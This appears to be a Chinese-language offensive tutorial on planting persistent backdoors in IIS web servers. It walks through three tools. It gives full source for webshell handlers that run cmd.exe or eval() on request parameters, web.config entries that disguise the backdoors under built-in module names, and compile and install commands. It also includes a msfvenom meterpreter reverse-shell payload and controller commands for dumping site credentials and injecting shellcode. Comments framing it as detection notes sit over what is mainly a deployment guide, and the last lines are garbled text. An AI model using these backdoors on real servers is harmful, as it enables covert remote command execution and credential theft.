IIS
IIS_Bin_Backdoor
From:https://github.com/WBGlIl/IIS_backdoor
IIS_backdoor_dll.dl放入 web 目录的 bin 文件夹中，配置 web.config 文件
<?xml version="1.0" encoding="UTF-8"?>
<!-- Site web.config that loads the backdoor DLL as a managed HTTP module.
     The type IIS_backdoor_dll.IISModule is resolved from the site's bin folder
     (the DLL is copied there per the text above), so the module is loaded for
     requests to this site. -->
<configuration>
    <system.webServer>
        <modules>
            <!-- Review point: an <add> here whose type is neither a framework module
                 nor part of the deployed application should be treated as suspicious
                 and checked against the assembly actually present in bin. -->
            <add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
        </modules>
    </system.webServer>
</configuration>
IIS_backdoor_shell.exe执行命令

使用IISBackdoor太明显，容易被看出是后门，这里对后门改名



重新生成解决方案，dll放入bin目录，web.config修改为
<?xml version="1.0" encoding="UTF-8"?>
<!-- Same module registration after the rename. The display name "UrlRoutingModule"
     borrows the name of ASP.NET's built-in routing module, but the type here is
     the custom UrlRoutingModule.IISModule, not System.Web.Routing.UrlRoutingModule.
     When auditing modules, compare the type attribute and the assembly it resolves
     to in bin, never the name alone. -->
<configuration>
    <system.webServer>
        <modules>
            <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
        </modules>
    </system.webServer>
</configuration>
添加定义后会自动在模块中注册好

执行payload，msf生成raw格式payload，选择shellcode选项，raw文件放入即可
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw

IIS_NETDLL_Spy
From:https://github.com/Ivan1ee/NetDLLSpy
原作者提及三种方式，第一种编译代码为DLL新建aspx文件实例化后门类来执行命令，第二种是做httphandler映射可指定一个后缀执行命令保存文件在web服务器上，再读取结果。第三种是使用jsc.exe编译js脚本生成dll，添加映射菜刀连接。
这里根据原作者的代码，进行了一下简单的修改，修改后的功能为添加httphandler映射指定一个后缀执行命令显示在页面上，不用保存在服务器中再访问。
代码
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
    /// <summary>
    /// Webshell-style <see cref="IHttpHandler"/>: every request that IIS routes to this
    /// handler (see the web.config &lt;handlers&gt; mapping on this page) can run an OS
    /// command supplied in the POST body. Documented here for analysis and detection;
    /// the two form-field names and the cmd.exe launch are the observable indicators.
    /// </summary>
    public class Handler : IHttpHandler
    {
        /// <summary>
        /// False: ASP.NET does not reuse this instance across requests.
        /// </summary>
        public bool IsReusable
        {
            get
            {
                return false;
            }
        }

        /// <summary>
        /// Request entry point. Reads the command from the form field
        /// "InternetInformationService" and runs it only when the form field
        /// "microsoft" equals "iis". That is a static trigger value, not authentication:
        /// any client that can POST to the mapped extension can drive the handler, so
        /// both field names are useful request-log indicators.
        /// </summary>
        /// <param name="context">The current request; only its form collection is read here.</param>
        public void ProcessRequest(HttpContext context)
        {
            string input = context.Request.Form["InternetInformationService"]; //command
            if (context.Request.Form["microsoft"] == "iis")//do command
            {
                this.cmdShell(input);
            }
        }

        /// <summary>
        /// Runs "cmd.exe /c &lt;input&gt;" with stdout redirected and writes whatever the
        /// process printed into the HTTP response.
        /// </summary>
        /// <param name="input">Command-line fragment, concatenated unvalidated after "/c ".
        /// A null value yields a bare "/c " invocation.</param>
        /// <remarks>
        /// Process.Start() here makes cmd.exe a child of the IIS worker process hosting the
        /// handler, which is the parent/child relationship a detection rule can key on.
        /// Stderr is not redirected, so error text never reaches the caller; the exit code
        /// is not checked; and the Process object itself is never disposed (only its stdout
        /// reader). Output goes through the static HttpContext.Current rather than the
        /// context passed to ProcessRequest.
        /// </remarks>
        public void cmdShell(string input)
        {
            Process process = new Process();
            process.StartInfo.FileName = "cmd.exe";
            process.StartInfo.RedirectStandardOutput = true;
            // Must be false for RedirectStandardOutput to take effect.
            process.StartInfo.UseShellExecute = false;
            process.StartInfo.Arguments = "/c " + input;
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.Start();
            StreamReader output = process.StandardOutput;
            // Blocks until cmd.exe closes its stdout, i.e. until the command has finished.
            String result = output.ReadToEnd();
            output.Close();
            output.Dispose();
            HttpContext.Current.Response.Write(result);
        }
    }
}
保存为随意后缀，使用csc编译。
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs

Web.config文件添加
<!-- web.config fragment that routes every request for the *.xxx extension to the
     IsapiModules.Handler class from the C# listing above. The name is styled after
     IIS's stock ASP.NET PageHandlerFactory handlers, but path and type are what
     matter when reviewing. resourceType="Unspecified" means the handler is invoked
     whether or not a file with that extension exists on disk, which is why any
     *.xxx URL on the site reaches the shell. -->
<system.webServer>
    <handlers>
        <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
    </handlers>
</system.webServer>

打开IIS管理器，可以看到处理映射管理器中已经添加了模块。

现在随意访问个xxx后缀的文件

带参数访问
microsoft=iis&InternetInformationService=net user


第三种连接菜刀，这里也对代码修改了一下。
import System;
import System.Web;
import System.IO;
// JScript.NET IHttpHandler (compiled with jsc.exe; see the command below).
// For every request it receives it writes "404 Not Found" into the body — the HTTP
// status code itself is not changed, so this is presumably a decoy — and then eval()s
// the raw value of the "Internet" request parameter as server-side script. Anyone
// who can send that parameter gets arbitrary code execution in the worker process;
// eval() on request input is the construct a reviewer or detection rule should key on.
package IsapiModule
{
    public class Handler implements IHttpHandler
    {
        function IHttpHandler.ProcessRequest(context : HttpContext)
        {
            context.Response.Write("404 Not Found")
            // Local aliases so script passed to eval() can refer to Request, Response
            // and Server by name (presumably what the connecting client expects).
            var I = context;
            var Request = I.Request;
            var Response = I.Response;
            var Server = I.Server;
            eval(context.Request["Internet"]); //pass
        }
        // True: a single handler instance is reused across requests.
        function get IHttpHandler.IsReusable() : Boolean{ return true}
    }
}
使用jsc编译
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js

编辑web.config，添加映射，这里指定的后缀是.iis
<!-- web.config fragment mapping *.iis to the JScript.NET IsapiModule.Handler above.
     No resourceType is given, so IIS's default (Unspecified) applies and the handler
     runs for any *.iis URL regardless of whether such a file exists. The other
     settings are independent of the handler: directoryBrowse enabled="true" exposes
     directory listings (a finding on its own), runAllManagedModulesForAllRequests
     widens module execution to every request, and the .json mimeMap is unrelated. -->
<system.webServer>
    <modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/>
    <staticContent>
        <mimeMap fileExtension=".json" mimeType="application/json" />
    </staticContent>
    <handlers>
        <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
    </handlers>
</system.webServer>
已自动加入了映射。现在随便访问个iis后缀的文件。


可使用菜刀直接连接


IIS_RAID
From:https://github.com/0x09AL/IIS-Raid
在vs2019下编译
在Functions.h中修改连接密码，passfile是dump下来的密码保存的位置，com_header是后门和服务器通信的请求头。

打开项目修改完你的密码，直接ctrl+B生成解决方案即可(这里生成的是release版本)
Dll传到服务器，改个名字，执行添加模块
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true

在模块中可以看到已经存在了

远程连接
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
执行命令的方式是
>cmd +命令

Dump命令可以dump下来IIS站点的登录的信息，保存在设置的位置。
Inject可以执行shellcode
Cs/msf生成raw格式的shellcode
>inject 位置

ๆๅๆดๆฐไบ
่ฟๆๅธฎๅฉๅ๏ผ